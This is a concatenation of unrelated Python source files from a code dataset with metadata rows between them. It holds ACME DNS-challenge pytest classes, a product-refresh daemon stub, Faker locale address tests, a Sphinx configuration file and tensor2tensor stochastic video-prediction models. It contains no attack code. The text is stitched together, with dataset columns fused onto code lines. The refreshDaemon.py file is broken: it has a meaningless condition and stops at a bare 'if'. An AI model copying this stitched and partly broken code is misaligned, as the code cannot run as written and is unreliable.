@pytest.mark.usefixtures('setup_pebble_docker')
class TestDNSMode:
    # dns-01 challenge tests against the Let's Encrypt staging CA; needs real
    # Aliyun DNS credentials (aliyun_access_key fixture) and no container
    # (docker_type(None)).

    @pytest.mark.parametrize('params', dns_mode_params)
    def test_dns_mode(self, params, aliyun_access_key: Dict[str, str]):
        key_dict = dict(
            access_key=aliyun_access_key['access_key'],
            secret=aliyun_access_key['secret']
        )
        params = dict(**params, **key_dict)
        _common(params, ca='staging')
        # brief pause between parametrised runs before the next DNS update
        time.sleep(5)
@pytest.mark.dnstest_pebble
@pytest.mark.docker_type('standalone')
@pytest.mark.usefixtures('setup_pebble_docker')
class TestDNSModePebble:
    # dns-01 challenge flow against the local pebble CA, exercised for both
    # RSA and ES256 CSR private keys; still needs real Aliyun credentials to
    # publish the DNS challenge records.

    @pytest.mark.parametrize('key_type', ['rsa', 'es256'])
    def test_dns_mode_pebble(self, key_type, aliyun_access_key: Dict[str, str]):
        key_dict = dict(
            access_key=aliyun_access_key['access_key'],
            secret=aliyun_access_key['secret']
        )
        params = dict(**_DNS_MODE_PEBBLE_PARAM, **key_dict)
        params.update(dict(domain=_STAGING_DOMAIN, csr_priv_key_type=key_type))
        # NOTE(review): the trailing "| ..." columns below are dataset
        # extraction residue fused onto the last source line.
        _common(params, ca='pebble') | 31.232932 | 80 | 0.653208
06c29994832d9f048f21df9ff9f47ca094cb2c9e | 474 | py | Python | backend/refreshDaemon.py | linorallo/Product_Finder | 49ee6796eb661e0fa00546047f085ab6fc012eaf | [
"MIT"
] | null | null | null | backend/refreshDaemon.py | linorallo/Product_Finder | 49ee6796eb661e0fa00546047f085ab6fc012eaf | [
"MIT"
] | null | null | null | backend/refreshDaemon.py | linorallo/Product_Finder | 49ee6796eb661e0fa00546047f085ab6fc012eaf | [
"MIT"
] | null | null | null | import Product_Finder.backend.db as db
import Product_Finder.backend.dbScripts as dbScripts
from datetime import timedelta, datetime
def checkProductUpdates():
actualTime = datetime.now()
timeDelta= timedelta(hours=5)
timeLimit= actualTime-timeDelta
dateFormat = '%Y-%m-%d %H:%M:%S'
for item in dbScripts.retrieveAll() :
discoveredTime = datetime.strptime(item[5],dateFormat)
if discoveredTime - timeLimit :
if
| 33.857143 | 63 | 0.689873 |
6c68b964da68eba5ce98181b1db293b737b089dc | 9,843 | py | Python | tests/providers/test_address.py | xxf-liub/faker1 | c966a144b370f7abb568a5154c4ef704e846722e | [
"MIT"
] | 1 | 2022-01-07T03:34:39.000Z | 2022-01-07T03:34:39.000Z | tests/providers/test_address.py | Saber-xxf/faker1 | c966a144b370f7abb568a5154c4ef704e846722e | [
"MIT"
] | null | null | null | tests/providers/test_address.py | Saber-xxf/faker1 | c966a144b370f7abb568a5154c4ef704e846722e | [
"MIT"
] | null | null | null | # coding=utf-8
from __future__ import unicode_literals
import re
import unittest
from decimal import Decimal
from ukpostcodeparser.parser import parse_uk_postcode
from faker import Faker
from faker.providers.address.de_DE import Provider as DeProvider
from faker.providers.address.el_GR import Provider as GrProvider
from faker.providers.address.en_AU import Provider as EnAuProvider
from faker.providers.address.en_CA import Provider as EnCaProvider
from faker.providers.address.ja_JP import Provider as JaProvider
from faker.providers.address.ne_NP import Provider as NeProvider
from six import string_types
class TestDeDE(unittest.TestCase):
    """Address-provider checks for the de_DE locale."""

    def setUp(self):
        self.factory = Faker('de_DE')

    def test_city(self):
        result = self.factory.city()
        self.assertIsInstance(result, string_types)
        self.assertIn(result, DeProvider.cities)

    def test_state(self):
        result = self.factory.state()
        self.assertIsInstance(result, string_types)
        self.assertIn(result, DeProvider.states)

    def test_street_suffix_short(self):
        result = self.factory.street_suffix_short()
        self.assertIsInstance(result, string_types)
        self.assertIn(result, DeProvider.street_suffixes_short)

    def test_street_suffix_long(self):
        result = self.factory.street_suffix_long()
        self.assertIsInstance(result, string_types)
        self.assertIn(result, DeProvider.street_suffixes_long)

    def test_country(self):
        result = self.factory.country()
        self.assertIsInstance(result, string_types)
        self.assertIn(result, DeProvider.countries)
class TestElGR(unittest.TestCase):
    """Address-provider checks for the el_GR locale."""

    def setUp(self):
        self.factory = Faker('el_GR')

    def test_line_address(self):
        self.assertIsInstance(self.factory.line_address(), string_types)

    def test_city(self):
        result = self.factory.city()
        self.assertIsInstance(result, string_types)
        self.assertIn(result, GrProvider.cities)

    def test_region(self):
        result = self.factory.region()
        self.assertIsInstance(result, string_types)
        self.assertIn(result, GrProvider.regions)

    def test_latlng(self):
        # latlng() returns a pair; the individual accessors return Decimals
        self.assertIsInstance(self.factory.latlng(), tuple)
        self.assertIsInstance(self.factory.latitude(), Decimal)
        self.assertIsInstance(self.factory.longitude(), Decimal)
class TestEnAU(unittest.TestCase):
    """ Tests addresses in the en_AU locale """

    def setUp(self):
        self.factory = Faker('en_AU')

    def test_postcode(self):
        # Australian postcodes are four digits.  Raw string: plain "\d" is an
        # invalid escape sequence (DeprecationWarning today, an error in
        # future Python versions).
        for _ in range(100):
            postcode = self.factory.postcode()
            assert re.match(r"\d{4}", postcode)

    def test_state(self):
        state = self.factory.state()
        assert isinstance(state, string_types)
        assert state in EnAuProvider.states

    def test_city_prefix(self):
        city_prefix = self.factory.city_prefix()
        assert isinstance(city_prefix, string_types)
        assert city_prefix in EnAuProvider.city_prefixes

    def test_state_abbr(self):
        state_abbr = self.factory.state_abbr()
        assert isinstance(state_abbr, string_types)
        assert state_abbr in EnAuProvider.states_abbr
        self.assertTrue(state_abbr.isupper())
class TestEnCA(unittest.TestCase):
    """Address-provider checks for the en_CA locale."""

    def setUp(self):
        self.factory = Faker('en_CA')

    def test_postalcode(self):
        # Canadian "A1A 1A1" shape (space optional); compile once, reuse
        pattern = re.compile("[A-Z][0-9][A-Z] ?[0-9][A-Z][0-9]")
        for _ in range(100):
            self.assertTrue(pattern.match(self.factory.postalcode()))

    def test_postal_code_letter(self):
        self.assertTrue(re.match("[A-Z]", self.factory.postal_code_letter()))

    def test_province(self):
        result = self.factory.province()
        self.assertIsInstance(result, string_types)
        self.assertIn(result, EnCaProvider.provinces)

    def test_province_abbr(self):
        result = self.factory.province_abbr()
        self.assertIsInstance(result, string_types)
        self.assertIn(result, EnCaProvider.provinces_abbr)

    def test_city_prefix(self):
        result = self.factory.city_prefix()
        self.assertIsInstance(result, string_types)
        self.assertIn(result, EnCaProvider.city_prefixes)

    def test_secondary_address(self):
        self.assertIsInstance(self.factory.secondary_address(), string_types)
class TestEnGB(unittest.TestCase):
    """Address-provider checks for the en_GB locale."""

    def setUp(self):
        self.factory = Faker('en_GB')

    def test_postcode(self):
        # every generated postcode must be parseable as a UK postcode
        for _ in range(100):
            parsed = parse_uk_postcode(self.factory.postcode())
            self.assertIsInstance(parsed, tuple)
class TestHuHU(unittest.TestCase):
    """Address-provider checks for the hu_HU locale."""

    def setUp(self):
        self.factory = Faker('hu_HU')

    def test_postcode_first_digit(self):
        # Hungarian postcodes are 'H-' followed by 4 digits, and the first
        # digit (string index 2, after the prefix) may not be zero.
        for _ in range(100):
            code = self.factory.postcode()
            self.assertGreater(code[2], "0")

    def test_street_address(self):
        """Street address variants in the hu_HU locale."""
        self.assertIsInstance(self.factory.address(), string_types)
        self.assertIsInstance(
            self.factory.street_address_with_county(), string_types)
class TestJaJP(unittest.TestCase):
    """ Tests addresses in the ja_JP locale """

    def setUp(self):
        self.factory = Faker('ja')

    def test_address(self):
        """Every component of a Japanese address has the expected type,
        source list or digit pattern."""
        country = self.factory.country()
        assert isinstance(country, string_types)
        assert country in JaProvider.countries

        prefecture = self.factory.prefecture()
        assert isinstance(prefecture, string_types)
        assert prefecture in JaProvider.prefectures

        city = self.factory.city()
        assert isinstance(city, string_types)
        assert city in JaProvider.cities

        town = self.factory.town()
        assert isinstance(town, string_types)
        assert town in JaProvider.towns

        # raw strings below: plain "\d" in a non-raw literal is an invalid
        # escape sequence (DeprecationWarning, later a SyntaxError)
        chome = self.factory.chome()
        assert isinstance(chome, string_types)
        assert re.match(r"\d{1,2}丁目", chome)

        ban = self.factory.ban()
        assert isinstance(ban, string_types)
        assert re.match(r"\d{1,2}番", ban)

        gou = self.factory.gou()
        assert isinstance(gou, string_types)
        assert re.match(r"\d{1,2}号", gou)

        building_name = self.factory.building_name()
        assert isinstance(building_name, string_types)
        assert building_name in JaProvider.building_names

        zipcode = self.factory.zipcode()
        assert isinstance(zipcode, string_types)
        assert re.match(r"\d{3}-\d{4}", zipcode)

        address = self.factory.address()
        assert isinstance(address, string_types)
class TestNeNP(unittest.TestCase):
    """Address-provider checks for the ne_NP locale."""

    def setUp(self):
        self.factory = Faker('ne_NP')

    def test_address(self):
        """Country, district and city come from the provider's fixed lists."""
        checks = (
            (self.factory.country(), NeProvider.countries),
            (self.factory.district(), NeProvider.districts),
            (self.factory.city(), NeProvider.cities),
        )
        for value, pool in checks:
            self.assertIsInstance(value, string_types)
            self.assertIn(value, pool)
class TestNoNO(unittest.TestCase):
    """Address-provider checks for the no_NO locale."""

    def setUp(self):
        self.factory = Faker('no_NO')

    def test_postcode(self):
        # Norwegian postcodes are exactly four digits
        pattern = re.compile(r'^[0-9]{4}$')
        for _ in range(100):
            self.assertTrue(pattern.match(self.factory.postcode()))

    def test_city_suffix(self):
        self.assertIsInstance(self.factory.city_suffix(), string_types)

    def test_street_suffix(self):
        self.assertIsInstance(self.factory.street_suffix(), string_types)

    def test_address(self):
        self.assertIsInstance(self.factory.address(), string_types)
class TestZhTW(unittest.TestCase):
    """Address-provider checks for the zh_TW locale."""

    def setUp(self):
        self.factory = Faker('zh_TW')

    def test_address(self):
        # each address component must be a (unicode) string
        for value in (self.factory.country(),
                      self.factory.street_name(),
                      self.factory.city(),
                      self.factory.address()):
            self.assertIsInstance(value, string_types)
class TestZhCN(unittest.TestCase):
    """Address-provider checks for the zh_CN locale."""

    def setUp(self):
        self.factory = Faker('zh_CN')

    def test_address(self):
        # each address component must be a (unicode) string
        for value in (self.factory.country(),
                      self.factory.street_name(),
                      self.factory.street_address(),
                      self.factory.province(),
                      self.factory.district(),
                      self.factory.address()):
            self.assertIsInstance(value, string_types)
        # mainland postcodes start with five digits
        postcode_pattern = re.compile(r'\d{5}')
        for _ in range(100):
            self.assertTrue(postcode_pattern.match(self.factory.postcode()))
| 31.148734 | 80 | 0.670832 |
e507c3949cfaea19292c415b12235e869f3e8c86 | 7,768 | py | Python | docs/conf.py | boeddeker/cntk_helper | c13bf249d4576fbd90f3ac8efb262f54b462a386 | [
"MIT"
] | null | null | null | docs/conf.py | boeddeker/cntk_helper | c13bf249d4576fbd90f3ac8efb262f54b462a386 | [
"MIT"
] | null | null | null | docs/conf.py | boeddeker/cntk_helper | c13bf249d4576fbd90f3ac8efb262f54b462a386 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#
# cntk_helper documentation build configuration file, created by
# sphinx-quickstart.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os
import sys
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'cntk_helper'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
# language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_domain_indices = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'cntk_helperdoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
# 'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index',
'cntk_helper.tex',
u'cntk_helper Documentation',
u"cbj", 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# If true, show page references after internal links.
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'cntk_helper', u'cntk_helper Documentation',
[u"cbj"], 1)
]
# If true, show URL addresses after external links.
# man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'cntk_helper', u'cntk_helper Documentation',
u"cbj", 'cntk_helper',
'A short description of the project.', 'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
# texinfo_appendices = []
# If false, no module index is generated.
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
# texinfo_show_urls = 'footnote'
| 31.706122 | 80 | 0.706874 |
5d3d7b7ed00f094f2efd15d41eadd314b25f8cab | 12,780 | py | Python | tensor2tensor/models/video/basic_stochastic.py | knarfamlap/tensor2tensor | f7e041d00e82e7d1bc2f3eb4dbf24cb246981ed8 | [
"Apache-2.0"
] | 2 | 2020-03-02T13:49:11.000Z | 2020-06-18T09:48:35.000Z | tensor2tensor/models/video/basic_stochastic.py | knarfamlap/tensor2tensor | f7e041d00e82e7d1bc2f3eb4dbf24cb246981ed8 | [
"Apache-2.0"
] | null | null | null | tensor2tensor/models/video/basic_stochastic.py | knarfamlap/tensor2tensor | f7e041d00e82e7d1bc2f3eb4dbf24cb246981ed8 | [
"Apache-2.0"
] | 1 | 2021-08-29T20:37:37.000Z | 2021-08-29T20:37:37.000Z | # coding=utf-8
# Copyright 2018 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Basic models for testing simple tasks."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensor2tensor.layers import common_attention
from tensor2tensor.layers import common_layers
from tensor2tensor.layers import common_video
from tensor2tensor.layers import discretization
from tensor2tensor.models.video import base_vae
from tensor2tensor.models.video import basic_deterministic
from tensor2tensor.models.video import basic_deterministic_params
from tensor2tensor.utils import registry
import tensorflow as tf
tfl = tf.layers
@registry.register_model
class NextFrameBasicStochastic(
    basic_deterministic.NextFrameBasicDeterministic,
    base_vae.NextFrameBaseVae):
  """Stochastic version of basic next-frame model."""

  def inject_latent(self, layer, inputs, target, action):
    """Sample a VAE-style latent from the clip and mix it into `layer`.

    Returns the augmented layer and the KL regularization loss.
    """
    del action  # Unused by the stochastic variant.
    num_mask_filters = 128
    # Build the latent distribution from the full clip (inputs + target).
    clip = tf.stack(inputs + [target], axis=1)
    latent_mean, latent_std = self.construct_latent_tower(clip, time_axis=1)
    # Reparameterized sample, flattened and given singleton spatial dims so
    # it broadcasts across the feature map.
    sample = common_video.get_gaussian_tensor(latent_mean, latent_std)
    sample = tf.expand_dims(tf.expand_dims(tfl.flatten(sample), axis=1), axis=1)
    latent_mask = tfl.dense(sample, num_mask_filters, name="latent_mask")
    # Adding an explicit zeros tensor broadcasts the mask to the layer's
    # spatial shape before concatenation.
    zeros_mask = tf.zeros(
        common_layers.shape_list(layer)[:-1] + [num_mask_filters],
        dtype=tf.float32)
    layer = tf.concat([layer, latent_mask + zeros_mask], axis=-1)
    extra_loss = self.get_kl_loss([latent_mean], [latent_std])
    return layer, extra_loss
@registry.register_model
class NextFrameBasicStochasticDiscrete(
    basic_deterministic.NextFrameBasicDeterministic):
  """Basic next-frame model with a tiny discrete latent."""

  @property
  def is_recurrent_model(self):
    # This model carries internal state between frames (see the
    # *_internal_states_* methods below).
    return True

  def init_internal_states(self):
    # Internal states are only used when concat_internal_states is set;
    # otherwise there is nothing to initialize.
    if not self.hparams.concat_internal_states:
      return None
    # Hardcoded frame shapes.
    max_batch_size = max(64, self.hparams.batch_size)
    shape = [max_batch_size] + self.hparams.problem.frame_shape[:-1] + [
        self.hparams.recurrent_state_size]
    with tf.variable_scope("clean_scope_for_internal_state"):
      # Non-trainable variable: the state is written via assign ops, not
      # by the optimizer.
      v = tf.get_variable("state", shape, trainable=False,
                          initializer=tf.zeros_initializer())
    return [[v]]

  def reset_internal_states_ops(self):
    # Resetting is implemented as saving all-zeros states.
    if not self.hparams.concat_internal_states:
      return [[tf.no_op()]]
    zeros = [[tf.zeros_like(s)] for s in self.internal_states[0]]
    return self.save_internal_states_ops(zeros)

  def load_internal_states_ops(self):
    if not self.hparams.concat_internal_states:
      return [[tf.no_op()]]
    ops = [[s.read_value()] for s in self.internal_states[0]]
    return ops

  def save_internal_states_ops(self, internal_states):
    if not self.hparams.concat_internal_states:
      return [[tf.no_op()]]
    ops = [[tf.assign(x, y)]
           for x, y in zip(self.internal_states[0], internal_states[0])]
    return ops

  def update_internal_states_early(self, internal_states, frames):
    """Update the internal states early in the network in GRU-like way."""
    batch_size = common_layers.shape_list(frames[0])[0]
    # The stored state is padded to max_batch_size; slice the active part.
    internal_state = internal_states[0][0][:batch_size, :, :, :]
    state_activation = tf.concat([internal_state, frames[0]], axis=-1)
    # One conv produces both the gate and the candidate (split below).
    state_gate_candidate = tf.layers.conv2d(
        state_activation, 2 * self.hparams.recurrent_state_size,
        (3, 3), padding="SAME", name="state_conv")
    state_gate, state_candidate = tf.split(state_gate_candidate, 2, axis=-1)
    state_gate = tf.nn.sigmoid(state_gate)
    state_candidate = tf.tanh(state_candidate)
    # GRU-style convex combination of old state and candidate.
    internal_state = internal_state * state_gate
    internal_state += state_candidate * (1.0 - state_gate)
    # Pad the batch dimension back up to the stored variable's size.
    max_batch_size = max(64, self.hparams.batch_size)
    diff_batch_size = max_batch_size - batch_size
    internal_state = tf.pad(
        internal_state, [[0, diff_batch_size], [0, 0], [0, 0], [0, 0]])
    return [[internal_state]]

  def inject_latent(self, layer, inputs, target, action):
    """Inject a deterministic latent based on the target frame."""
    hparams = self.hparams
    final_filters = common_layers.shape_list(layer)[-1]
    filters = hparams.hidden_size
    kernel = (4, 4)
    layer_shape = common_layers.shape_list(layer)

    def add_bits(layer, bits):
      # Unbottleneck the latent bits into the layer, either additively or
      # with a multiplicative (sigmoid-gated) + additive combination.
      z_mul = tfl.dense(bits, final_filters, name="unbottleneck_mul")
      if not hparams.complex_addn:
        return layer + z_mul
      layer *= tf.nn.sigmoid(z_mul)
      z_add = tfl.dense(bits, final_filters, name="unbottleneck_add")
      layer += z_add
      return layer

    if not self.is_training:
      # At inference time the target frame is unknown: sample random bits
      # (full tower) or predict them with the latent LSTM.
      if hparams.full_latent_tower:
        rand = tf.random_uniform(layer_shape[:-1] + [hparams.bottleneck_bits])
        bits = 2.0 * tf.to_float(tf.less(0.5, rand)) - 1.0
      else:
        bits, _ = discretization.predict_bits_with_lstm(
            layer, hparams.latent_predictor_state_size, hparams.bottleneck_bits,
            temperature=hparams.latent_predictor_temperature)
        bits = tf.expand_dims(tf.expand_dims(bits, axis=1), axis=2)
      return add_bits(layer, bits), 0.0

    # Embed.
    frames = tf.concat(inputs + [target], axis=-1)
    x = tfl.dense(
        frames, filters, name="latent_embed",
        bias_initializer=tf.random_normal_initializer(stddev=0.01))
    x = common_attention.add_timing_signal_nd(x)

    # Add embedded action if present.
    if action is not None:
      x = common_video.inject_additional_input(
          x, action, "action_enc_latent", hparams.action_injection)

    if hparams.full_latent_tower:
      # Convolutional downsampling tower producing a spatial latent.
      for i in range(hparams.num_compress_steps):
        with tf.variable_scope("latent_downstride%d" % i):
          x = common_layers.make_even_size(x)
          if i < hparams.filter_double_steps:
            filters *= 2
          x = common_attention.add_timing_signal_nd(x)
          x = tfl.conv2d(x, filters, kernel,
                         activation=common_layers.belu,
                         strides=(2, 2), padding="SAME")
          x = common_layers.layer_norm(x)
    else:
      x = common_layers.double_discriminator(x)
      x = tf.expand_dims(tf.expand_dims(x, axis=1), axis=1)

    bits, bits_clean = discretization.tanh_discrete_bottleneck(
        x, hparams.bottleneck_bits, hparams.bottleneck_noise,
        hparams.discretize_warmup_steps, hparams.mode)
    # NOTE(review): `pred_loss` is only assigned inside the branch below, so
    # with full_latent_tower=True the final `return res, pred_loss` would
    # raise NameError — confirm whether that configuration is ever used.
    if not hparams.full_latent_tower:
      _, pred_loss = discretization.predict_bits_with_lstm(
          layer, hparams.latent_predictor_state_size, hparams.bottleneck_bits,
          target_bits=bits_clean)
      # Mix bits from latent with predicted bits on forward pass as a noise.
      if hparams.latent_rnn_max_sampling > 0.0:
        with tf.variable_scope(tf.get_variable_scope(), reuse=True):
          bits_pred, _ = discretization.predict_bits_with_lstm(
              layer, hparams.latent_predictor_state_size,
              hparams.bottleneck_bits,
              temperature=hparams.latent_predictor_temperature)
          bits_pred = tf.expand_dims(tf.expand_dims(bits_pred, axis=1), axis=2)
        # Be bits_pred on the forward pass but bits on the backward one.
        bits_pred = bits_clean + tf.stop_gradient(bits_pred - bits_clean)
        # Select which bits to take from pred sampling with bit_p probability.
        which_bit = tf.random_uniform(common_layers.shape_list(bits))
        bit_p = common_layers.inverse_lin_decay(hparams.latent_rnn_warmup_steps)
        bit_p *= hparams.latent_rnn_max_sampling
        bits = tf.where(which_bit < bit_p, bits_pred, bits)

    res = add_bits(layer, bits)
    # During training, sometimes skip the latent to help action-conditioning.
    res_p = common_layers.inverse_lin_decay(hparams.latent_rnn_warmup_steps / 2)
    res_p *= hparams.latent_use_max_probability
    res_rand = tf.random_uniform([layer_shape[0]])
    res = tf.where(res_rand < res_p, res, layer)
    return res, pred_loss
@registry.register_hparams
def next_frame_basic_stochastic():
  """Basic 2-frame conv model with stochastic tower."""
  hparams = basic_deterministic_params.next_frame_basic_deterministic()
  hparams.stochastic_model = True
  # Hyper-parameters introduced by the stochastic (VAE) tower.
  for name, value in [
      ("latent_channels", 1),
      ("latent_std_min", -5.0),
      ("num_iterations_1st_stage", 15000),
      ("num_iterations_2nd_stage", 15000),
      ("latent_loss_multiplier", 1e-3),
      ("latent_loss_multiplier_dynamic", False),
      ("latent_loss_multiplier_alpha", 1e-5),
      ("latent_loss_multiplier_epsilon", 1.0),
      ("latent_loss_multiplier_schedule", "constant"),
      ("latent_num_frames", 0),  # 0 means use all frames.
      ("anneal_end", 50000),
      ("information_capacity", 0.0),
  ]:
    hparams.add_hparam(name, value)
  return hparams
@registry.register_hparams
def next_frame_sampling_stochastic():
  """Basic 2-frame conv model with stochastic tower."""
  hparams = basic_deterministic_params.next_frame_sampling()
  hparams.stochastic_model = True
  # Hyper-parameters introduced by the stochastic (VAE) tower.
  for name, value in [
      ("latent_channels", 1),
      ("latent_std_min", -5.0),
      ("num_iterations_1st_stage", 15000),
      ("num_iterations_2nd_stage", 15000),
      ("latent_loss_multiplier", 1e-3),
      ("latent_loss_multiplier_dynamic", False),
      ("latent_loss_multiplier_alpha", 1e-5),
      ("latent_loss_multiplier_epsilon", 1.0),
      ("latent_loss_multiplier_schedule", "constant"),
      ("latent_num_frames", 0),  # 0 means use all frames.
      ("anneal_end", 40000),
      ("information_capacity", 0.0),
  ]:
    hparams.add_hparam(name, value)
  return hparams
@registry.register_hparams
def next_frame_basic_stochastic_discrete():
  """Basic 2-frame conv model with stochastic discrete latent."""
  hparams = basic_deterministic_params.next_frame_sampling()
  # Overrides of the base sampling configuration.
  hparams.batch_size = 4
  hparams.video_num_target_frames = 6
  hparams.scheduled_sampling_mode = "prob_inverse_lin"
  hparams.scheduled_sampling_decay_steps = 40000
  hparams.scheduled_sampling_max_prob = 1.0
  hparams.dropout = 0.15
  hparams.filter_double_steps = 3
  hparams.hidden_size = 96
  hparams.learning_rate_constant = 0.002
  hparams.learning_rate_warmup_steps = 2000
  hparams.learning_rate_schedule = "linear_warmup * constant"
  hparams.concat_internal_states = True
  hparams.video_modality_loss_cutoff = 0.03
  # Hyper-parameters introduced by the discrete latent.
  for name, value in [
      ("bottleneck_bits", 128),
      ("bottleneck_noise", 0.1),
      ("discretize_warmup_steps", 40000),
      ("latent_rnn_warmup_steps", 40000),
      ("latent_rnn_max_sampling", 0.5),
      ("latent_use_max_probability", 0.8),
      ("full_latent_tower", False),
      ("latent_predictor_state_size", 128),
      ("latent_predictor_temperature", 1.0),
      ("complex_addn", True),
      ("recurrent_state_size", 64),
  ]:
    hparams.add_hparam(name, value)
  return hparams
@registry.register_hparams
def next_frame_basic_stochastic_discrete_long():
  """Conv model with stochastic discrete latent, long predictions."""
  hparams = next_frame_basic_stochastic_discrete()
  # Longer rollout; halve the batch so it still fits in memory.
  hparams.video_num_target_frames = 16
  hparams.batch_size = 2
  return hparams
@registry.register_ranged_hparams
def next_frame_stochastic_discrete_range(rhp):
  """Next frame stochastic discrete tuning grid."""
  # Optimizer / regularization / capacity search ranges.
  rhp.set_float("learning_rate_constant", 0.001, 0.01)
  rhp.set_float("dropout", 0.2, 0.6)
  rhp.set_int("filter_double_steps", 3, 5)
  rhp.set_discrete("hidden_size", [64, 96, 128])
  # Discrete-latent capacity and noise ranges.
  rhp.set_discrete("bottleneck_bits", [32, 64, 128, 256])
  rhp.set_discrete("video_num_target_frames", [4])
  rhp.set_float("bottleneck_noise", 0.0, 0.2)
@registry.register_ranged_hparams
def next_frame_stochastic_discrete_latent_range(rhp):
  """Tuning grid over the latent-sampling hyper-parameters."""
  rhp.set_float("latent_rnn_max_sampling", 0.1, 0.9)
  rhp.set_float("latent_predictor_temperature", 0.1, 1.2)
  rhp.set_float("latent_use_max_probability", 0.4, 1.0)
  rhp.set_float("dropout", 0.1, 0.4)
| 41.493506 | 80 | 0.736933 |
576acdeffa5868403b96b5ac1bdd4a2d2445eb90 | 9,393 | py | Python | deepvariant/realigner/window_selector.py | fabbondanza/deepvariant | c0820eb6b185c612555a80febf89d761c383fafd | [
"BSD-3-Clause"
] | 1 | 2019-05-20T11:55:45.000Z | 2019-05-20T11:55:45.000Z | deepvariant/realigner/window_selector.py | fabbondanza/deepvariant | c0820eb6b185c612555a80febf89d761c383fafd | [
"BSD-3-Clause"
] | null | null | null | deepvariant/realigner/window_selector.py | fabbondanza/deepvariant | c0820eb6b185c612555a80febf89d761c383fafd | [
"BSD-3-Clause"
